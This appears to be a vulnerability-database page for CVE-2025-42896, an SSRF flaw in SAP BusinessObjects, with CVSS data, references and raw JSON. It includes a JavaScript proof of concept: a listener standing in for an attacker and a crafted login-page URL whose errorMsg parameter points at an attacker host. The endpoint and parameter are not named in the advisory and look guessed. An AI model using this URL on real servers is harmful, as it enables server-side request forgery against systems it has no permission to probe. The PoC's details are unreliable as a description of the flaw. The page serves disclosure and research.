Security Vulnerability Report
CVE-2025-42896 CVSS 5.4 MEDIUM

CVE-2025-42896

Published: 2025-12-09 16:17:53
Last Modified: 2026-04-15 00:35:42

Description

SAP BusinessObjects Business Intelligence Platform lets an unauthenticated remote attacker send crafted requests through the URL parameter that controls the login page error message. This can cause the server to fetch attacker-supplied URLs, resulting in low impact to confidentiality and integrity, and no impact to availability.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP BusinessObjects Business Intelligence Platform (for the specific affected versions, refer to SAP Security Note 3651390)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// CVE-2025-42896 SSRF PoC for SAP BusinessObjects BI Platform
// This PoC demonstrates how an attacker can inject a malicious URL
// through the error message parameter to trigger server-side request forgery
const http = require('http');

// Attacker-controlled server to receive SSRF requests
const attackerServer = http.createServer((req, res) => {
  console.log('[+] Received request from victim server');
  console.log('[+] Request URL:', req.url);
  console.log('[+] Request Headers:', req.headers);

  // Log request details for analysis (the remote address of the incoming
  // connection is the server that performed the fetch, i.e. the victim)
  const clientIP = req.socket.remoteAddress;
  console.log(`[+] Connecting host IP: ${clientIP}`);

  // Send response to victim server
  res.writeHead(200, {'Content-Type': 'text/html'});
  res.end('SSRF Test Response');
});

attackerServer.listen(8080, () => {
  console.log('[*] Attacker server listening on port 8080');
});

// Simulated attack URL pattern
// The attacker would craft a URL like:
// https://target-sap-server/BOE/logon.aspx?errorMsg=http://attacker-server:8080/malicious-endpoint
//
// The errorMsg parameter is exploited to trigger SSRF
// Server will fetch the attacker-controlled URL, leaking internal information

// Example malicious URL construction
const targetBaseUrl = 'https://sap-boserver.example.com';
const attackerUrl = 'http://attacker-server:8080/internal-api';
const maliciousUrl = `${targetBaseUrl}/BOE/logon.aspx?errorMsg=${encodeURIComponent(attackerUrl)}`;
console.log(`[*] Malicious URL: ${maliciousUrl}`);
console.log('[*] Social engineering required to trick user into visiting this URL');

References

https://me.sap.com/notes/3651390 (SAP Security Note 3651390)
https://url.sap/sapsecuritypatchday (SAP Security Patch Day)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-42896",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-09T16:17:52.787",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "SAP BusinessObjects Business Intelligence Platform lets an unauthenticated remote attacker send crafted requests through the URL parameter that controls the login page error message. This can cause the server to fetch attacker-supplied URLs, resulting in low impact to confidentiality and integrity, and no impact to availability."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-116"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://me.sap.com/notes/3651390",
        "source": "[email protected]"
      },
      {
        "url": "https://url.sap/sapsecuritypatchday",
        "source": "[email protected]"
      }
    ]
  }
}